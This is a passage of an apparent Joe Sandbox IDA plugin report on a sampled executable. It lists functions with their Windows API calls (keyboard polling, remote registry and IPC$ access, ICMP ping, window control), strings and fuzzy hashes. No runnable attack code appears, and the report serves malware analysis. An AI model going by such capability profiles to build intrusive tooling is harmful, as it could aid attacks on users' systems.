RemoveDirectoryW.KERNEL32(?), ref: 00604728
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006047AF
CloseHandle.KERNEL32(00000000), ref: 006047BA
CloseHandle.KERNEL32(00000000), ref: 006047C5

Strings

\??\%s, xrefs: 006046B5
:, xrefs: 006046DC
\, xrefs: 006046D1

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 1790d4b2c5db7459577e9b48a567f44765d47498edc838deceb423a90a8d8fd1
Instruction ID: a0274e1ea5f9245b155140490e0efcb4234f2a6635050a57788a0f10fa2e1a38
Opcode Fuzzy Hash: 1790d4b2c5db7459577e9b48a567f44765d47498edc838deceb423a90a8d8fd1
Instruction Fuzzy Hash: 8031A3B194021AABDB31DFA0DC49FEF37BEEF8A741F1041A5F605D61A0EB7096458B24

Uniqueness

Uniqueness Score: -1.00%

Function 005FEEDC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 005FEEE0

Part of subcall function 005AF27E: timeGetTime.WINMM(?,?,005FEF00), ref: 005AF282

Sleep.KERNEL32(0000000A), ref: 005FEF0D
EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 005FEF31
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 005FEF53
SetActiveWindow.USER32 ref: 005FEF72
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005FEF80
SendMessageW.USER32(00000010,00000000,00000000), ref: 005FEF9F
Sleep.KERNEL32(000000FA), ref: 005FEFAA
IsWindow.USER32 ref: 005FEFB6
EndDialog.USER32(00000000), ref: 005FEFC7

Strings

BUTTON, xrefs: 005FEF45

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 83e19bab32ae6831023ea3684cb31e65df1f4c4930084b9f7c3807b208363b69
Instruction ID: 627d986ea875832cea027b54c612b4bbf0e29e9ed4f4412f0738a6fdede417f5
Opcode Fuzzy Hash: 83e19bab32ae6831023ea3684cb31e65df1f4c4930084b9f7c3807b208363b69
Instruction Fuzzy Hash: 6E21967420060DBFEB116F68EC8AA3A3F6BFB45344F102415F611E23B1DBB98D11DA64

Uniqueness

Uniqueness Score: -1.00%

Function 005FF228 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005FF289
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 005FF29F
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005FF2B0
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 005FF2C2
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 005FF2D3

Strings

play PlayMe, xrefs: 005FF2CE
status PlayMe mode, xrefs: 005FF284
close PlayMe, xrefs: 005FF29A, 005FF2C7
alias PlayMe, xrefs: 005FF262
play PlayMe wait, xrefs: 005FF2BD
open , xrefs: 005FF238

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: c0c21dab9ba73a309bb113454df8efeb8ca89c0d6d7556513796d1b91ef29f24
Instruction ID: eb663468f9fa3a57cabe1c6f4660a60812c3b6473e5444edb72be3784b97aabc
Opcode Fuzzy Hash: c0c21dab9ba73a309bb113454df8efeb8ca89c0d6d7556513796d1b91ef29f24
Instruction Fuzzy Hash: F5118635A5025E79EB20A7A1EC4EEFF6E7DFFD1B10F4104397901A20D5DAA05D09C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 005C3010 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005C3024

Part of subcall function 005C2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4), ref: 005C2D6E
Part of subcall function 005C2D58: GetLastError.KERNEL32(00661DC4,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4,00661DC4), ref: 005C2D80

_free.LIBCMT ref: 005C3030
_free.LIBCMT ref: 005C303B
_free.LIBCMT ref: 005C3046
_free.LIBCMT ref: 005C3051
_free.LIBCMT ref: 005C305C
_free.LIBCMT ref: 005C3067
_free.LIBCMT ref: 005C3072
_free.LIBCMT ref: 005C307D
_free.LIBCMT ref: 005C308B

Strings

&c, xrefs: 005C301B

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: &c
API String ID: 776569668-4082378586
Opcode ID: 96c349439abc3286ae55b1c7eda44685d8258047572edaf41c196ba228b131f4
Instruction ID: beeaf40d00580931100dd75d64da22f2a0540b3bead8dab811e3b8703e6bcc34
Opcode Fuzzy Hash: 96c349439abc3286ae55b1c7eda44685d8258047572edaf41c196ba228b131f4
Instruction Fuzzy Hash: 551193B610014DAFCB01EF94C846EDD3FA5FF55350F4140A9BA199B232DA71EAD29F80

Uniqueness

Uniqueness Score: -1.00%

Function 005FA86D Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 005FA8EE
SetKeyboardState.USER32(?), ref: 005FA959
GetAsyncKeyState.USER32(000000A0), ref: 005FA979
GetKeyState.USER32(000000A0), ref: 005FA990
GetAsyncKeyState.USER32(000000A1), ref: 005FA9BF
GetKeyState.USER32(000000A1), ref: 005FA9D0
GetAsyncKeyState.USER32(00000011), ref: 005FA9FC
GetKeyState.USER32(00000011), ref: 005FAA0A
GetAsyncKeyState.USER32(00000012), ref: 005FAA33
GetKeyState.USER32(00000012), ref: 005FAA41
GetAsyncKeyState.USER32(0000005B), ref: 005FAA6A
GetKeyState.USER32(0000005B), ref: 005FAA78

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 2a119c73e546fae8533a4fccc23efb3b09b2a5711c19d7fad50d08c7e13cbc8d
Instruction ID: 7d3547355d7d9e012808db6b6f29164c3fbdf3ae5b94bbf28ebf40e73f67c37f
Opcode Fuzzy Hash: 2a119c73e546fae8533a4fccc23efb3b09b2a5711c19d7fad50d08c7e13cbc8d
Instruction Fuzzy Hash: 5451E8B090478D69FB35E7B089147FABFB5BF11380F088599C6CA171C2DA989A4CC763

Uniqueness

Uniqueness Score: -1.00%

Function 005F6555 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 005F6571
GetWindowRect.USER32(00000000,?), ref: 005F658A
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 005F65E8
GetDlgItem.USER32(?,00000002), ref: 005F65F8
GetWindowRect.USER32(00000000,?), ref: 005F660A
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 005F665E
GetDlgItem.USER32(?,000003E9), ref: 005F666C
GetWindowRect.USER32(00000000,?), ref: 005F667E
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 005F66C0
GetDlgItem.USER32(?,000003EA), ref: 005F66D3
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005F66E9
InvalidateRect.USER32(?,00000000,00000001), ref: 005F66F6

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 30f035c5f3ba3ac39014e00604c58a6a0688acf0ba44bf9ac8a3f53624acdcc6
Instruction ID: cc17216296801493ced375040109abdbb08a250ad653cec95321858ac442d24e
Opcode Fuzzy Hash: 30f035c5f3ba3ac39014e00604c58a6a0688acf0ba44bf9ac8a3f53624acdcc6
Instruction Fuzzy Hash: 485121B1B00609AFDF18CF68DD99AAEBBB6FB48301F108129F919E7294D7749D05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 005920D8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 005921E4: GetWindowLongW.USER32(?,000000EB), ref: 005921F2

GetSysColor.USER32(0000000F), ref: 00592102

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 3d7688ca2352286d364e211ab96059b6fba8292fd866a9663ee3ddb6bdb32ac5
Instruction ID: fd63abb28ad0947bee5cc5d4d6911a9a85c91a02b64c36427f9e17b4ac464a7a
Opcode Fuzzy Hash: 3d7688ca2352286d364e211ab96059b6fba8292fd866a9663ee3ddb6bdb32ac5
Instruction Fuzzy Hash: 57418031100A40AFDF345F38DC48BBA3F66BB46320F144656FAA2872E1C7719D62EB11

Uniqueness

Uniqueness Score: -1.00%

Function 005F0F6E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005F1032
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005F104E
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005F106A
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005F1094
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 005F10BC
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F10C7
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F10CC

Strings

\IPC$, xrefs: 005F1014
\CLSID, xrefs: 005F0FB4
SOFTWARE\Classes\, xrefs: 005F0F9E

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 1a7888126e99668851b795285d69178c334b32a4e672af43577df6db7cc3f601
Instruction ID: c987d3319b487fa1ad82c8fa7553131dd51018361975ae16c07486235fcaf8d8
Opcode Fuzzy Hash: 1a7888126e99668851b795285d69178c334b32a4e672af43577df6db7cc3f601
Instruction Fuzzy Hash: 30410772C1062EABDF21EFA4DC899EDBBB9BF54300F444129F901A3161EB749E09CB50

Uniqueness

Uniqueness Score: -1.00%

Function 006248F7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0062499A
CreateCompatibleDC.GDI32(00000000), ref: 006249A1
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006249B4
SelectObject.GDI32(00000000,00000000), ref: 006249BC
GetPixel.GDI32(00000000,00000000,00000000), ref: 006249C7
DeleteDC.GDI32(00000000), ref: 006249D1
GetWindowLongW.USER32(?,000000EC), ref: 006249DB
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 006249F1
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 006249FD

Strings

static, xrefs: 00624932

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: c956ee85fb7a22d13e913743b294488614ff3ef6ad7f1bc61684007baf0a1d98
Instruction ID: ccb28f94c3543853c56693bc7c3a073e665eb11e027fb8cc4ac5a33e2139281e
Opcode Fuzzy Hash: c956ee85fb7a22d13e913743b294488614ff3ef6ad7f1bc61684007baf0a1d98
Instruction Fuzzy Hash: EB31AE32100A29AFDF219FA4DC08FDA3B6AFF0D364F110211FA54A61A0CB75D861DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0061458D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006145B9
CoInitialize.OLE32(00000000), ref: 006145E7
CoUninitialize.OLE32 ref: 006145F1
_wcslen.LIBCMT ref: 0061468A
GetRunningObjectTable.OLE32(00000000,?), ref: 0061470E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00614832
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0061486B
CoGetObject.OLE32(?,00000000,00630B64,?), ref: 0061488A
SetErrorMode.KERNEL32(00000000), ref: 0061489D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00614921
VariantClear.OLEAUT32(?), ref: 00614935

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: e03d2d51e66c71a8e29b09361ef39d9ca53026cbb4c345a819b885cd3d7553d9
Instruction ID: 4e2f0cb1686f58307dd543dee758d4421848e432d47e4a4939fd5ea0eeba0b08
Opcode Fuzzy Hash: e03d2d51e66c71a8e29b09361ef39d9ca53026cbb4c345a819b885cd3d7553d9
Instruction Fuzzy Hash: 74C138716043059FD700DF24C8849ABBBEAFF89748F18491DF98A9B251DB31ED46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 006083F0 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0060844D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006084E9
SHGetDesktopFolder.SHELL32(?), ref: 006084FD
CoCreateInstance.OLE32(00630CD4,00000000,00000001,00657E8C,?), ref: 00608549
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006085CE
CoTaskMemFree.OLE32(?,?), ref: 00608626
SHBrowseForFolderW.SHELL32(?), ref: 006086B1
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006086D4
CoTaskMemFree.OLE32(00000000), ref: 006086DB
CoTaskMemFree.OLE32(00000000), ref: 00608730
CoUninitialize.OLE32 ref: 00608736

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 8233970910bdb4b74b3c6a2299fa6c375dc9992f2094eb9105769a3c3c5ae968
Instruction ID: 97033b71dda50f0c2e43366983ccdafa2d20a0c1ee9702368c99b36b9b3915fe
Opcode Fuzzy Hash: 8233970910bdb4b74b3c6a2299fa6c375dc9992f2094eb9105769a3c3c5ae968
Instruction Fuzzy Hash: D1C11C75A00219AFDB14DFA4C888DAEBBFAFF48304B148198E559DB361CB31ED46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 005F0318 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005F033F
SafeArrayAllocData.OLEAUT32(?), ref: 005F0398
VariantInit.OLEAUT32(?), ref: 005F03AA
SafeArrayAccessData.OLEAUT32(?,?), ref: 005F03CA
VariantCopy.OLEAUT32(?,?), ref: 005F041D
SafeArrayUnaccessData.OLEAUT32(?), ref: 005F0431
VariantClear.OLEAUT32(?), ref: 005F0446
SafeArrayDestroyData.OLEAUT32(?), ref: 005F0453
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005F045C
VariantClear.OLEAUT32(?), ref: 005F046E
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005F0479

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: d5bbd2135794e5beb025c3d19584fcfec60503625b2e8d42b773bcdf72134281
Instruction ID: 6259f8640bd15d2c509da7de888a18d9ad4fb9ab1b80926ca9a219bb4b170434
Opcode Fuzzy Hash: d5bbd2135794e5beb025c3d19584fcfec60503625b2e8d42b773bcdf72134281
Instruction Fuzzy Hash: EC418335A00219DFCF10EF64C8489AE7FB9FF48344F049429EA55A72A1CB34A946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0062A8E5 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00592441: GetWindowLongW.USER32(00000000,000000EB), ref: 00592452

GetSystemMetrics.USER32(0000000F), ref: 0062A926
GetSystemMetrics.USER32(0000000F), ref: 0062A946
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0062AB83
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0062ABA1
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0062ABC2
ShowWindow.USER32(00000003,00000000), ref: 0062ABE1
InvalidateRect.USER32(?,00000000,00000001), ref: 0062AC06
DefDlgProcW.USER32(?,00000005,?,?), ref: 0062AC29

Strings

, xrefs: 0062AB37

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-3916222277
Opcode ID: 225a22ea82d8a3ddbfeff561b3d2ffbd5a59e1d3b325ccbd756fc738a93c4188
Instruction ID: 42b1ec4a26c4aac2e673abd9a90b09017e4d6595406cef6acb766396c605f6d2
Opcode Fuzzy Hash: 225a22ea82d8a3ddbfeff561b3d2ffbd5a59e1d3b325ccbd756fc738a93c4188
Instruction Fuzzy Hash: A4B18A31600A29DFDF14CFA9DA857AE7BB3BF44701F188069EC459A295D7B0A980CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00610EB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00610F19
inet_addr.WSOCK32(?), ref: 00610F79
gethostbyname.WSOCK32(?), ref: 00610F85
IcmpCreateFile.IPHLPAPI ref: 00610F93
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00611023
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00611042
IcmpCloseHandle.IPHLPAPI(?), ref: 00611116
WSACleanup.WSOCK32 ref: 0061111C

Strings

Ping, xrefs: 00610FD3

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 878dceced7d9b4b264da953dab2a0f48fa5a9766de43c0678f2eade776c8e588
Instruction ID: 368ded6fab3caa611801ad7b76b19d3f1d179c54af7dd208997b80549bed0cf9
Opcode Fuzzy Hash: 878dceced7d9b4b264da953dab2a0f48fa5a9766de43c0678f2eade776c8e588
Instruction Fuzzy Hash: FD91A1316042419FD720CF15C889B96BBE2FF89318F188599F5698F7A2C771ED86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00608AEF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00608BB1
